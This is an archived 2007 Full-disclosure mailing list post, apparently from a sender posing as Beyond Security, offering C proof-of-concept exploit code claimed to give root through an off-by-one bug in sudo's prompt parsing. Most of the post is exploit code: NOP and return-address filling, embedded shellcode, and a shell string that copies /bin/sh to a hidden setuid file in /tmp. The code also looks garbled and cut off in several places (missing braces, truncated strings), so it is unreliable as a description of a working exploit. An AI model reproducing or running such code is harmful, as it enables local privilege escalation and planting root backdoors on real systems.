[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] [Beyond Security] New sudo off-by-one poc exploit.
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] [Beyond Security] New sudo off-by-one poc exploit.
- From: Beyond Security <beyondsequritee@xxxxxxxxx>
- Date: Sun, 5 Aug 2007 15:48:13 -0700 (PDT)
* off by one ebp overwrite in sudo prompt parsing
* discovered by beyond security in 2007, thx ge
* to compile: gcc -pipe -o sobo sobo.c ; ./sobo
* please use responsibly! a patch has already been
* upstream and a fix will be included in the next
sudo release
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>
#define SPROMPT "%u@%h> \\%"
#define shellcode esp
#define RETS_NUM 246
#define NOPS_NUM 116
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
void fill (char *buff, int size, unsigned long val) {
unsigned long *ptr = (unsigned long *) buff;
for (size /= sizeof (unsigned long); size > 0;
size--) *ptr++ = val;
unsigned long get_sp (void) {
__asm__ ("lea esp, %eax");
char *exp (char nops_nums, char rets_nums, char
*shellcode) {
int size = strlen (SPROMPT) + nops_nums + rets_nums
+ strlen (shellcode);
unsigned char *nops = alloca (nops_nums);
unsigned char *rets = alloca (rets_nums);
unsigned long ret = get_sp ();
static char exp_buffer [8192];
/* ensure isatty() fails */
close (0); close (1); close (2);
fill (nops, (unsigned char) nops_nums, 0x90909090);
fill (rets, (unsigned char) rets_nums, ret);
if (size > sizeof (exp_buffer)) {
fprintf (stderr, "buffer is too small\n");
return NULL;
snprintf (exp_buffer, sizeof (exp_buffer),
SPROMPT, nops, shellcode, rets);
return exp_buffer;
int main(int argv, char *argc[]) {
char *exploit = exp (NOPS_NUM, RETS_NUM, shellcode);
execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p",
exploit, "/bin/false", NULL);
/* shellroot should await you @ "HISTFILE=/dev/null
/tmp/.beyond -p" */
return 0;
Got a little couch potato?
Check out fun summer activities for kids.
Looking for a deal? Find great prices on flights and hotels with Yahoo!
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/